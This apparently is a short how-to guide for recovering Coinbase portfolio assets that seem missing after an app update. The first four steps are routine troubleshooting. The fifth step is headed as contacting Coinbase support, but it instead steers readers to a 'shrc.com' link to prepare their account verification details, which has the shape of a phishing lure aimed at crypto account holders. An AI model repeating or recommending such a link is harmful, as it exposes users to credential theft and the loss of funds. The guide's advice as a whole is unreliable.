If you've recently updated your Coinbase app and noticed that some of your portfolio assets are missing, follow these steps to retrieve them. This guide will help you navigate the process effectively. Step 1. Check your account balance. Log into your Coinbase account and check your account balance. Ensure that the missing assets are not simply hidden or displayed incorrectly due to the update. Step 2. Update the app. Make sure that you have the latest version of the Coinbase app installed. Go to your device's App Store, search for Coinbase, and update the app if a new version is available. Step 3. Clear cache and data. If the assets are still missing, try clearing the cache and data of the Coinbase app. Go to your device settings, find the Coinbase app and select the option to clear cache and data. Restart the app afterward. Step 4. Relog into your account. Log out of your Coinbase account and then log back in. This can refresh your account and may help in displaying the missing assets correctly. Step 5. Contact Coinbase support. Before starting recovery, use the shrc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. By following these steps, you should be able to retrieve your missing portfolio assets. If issues persist, Coinbase support is your best resource for resolution.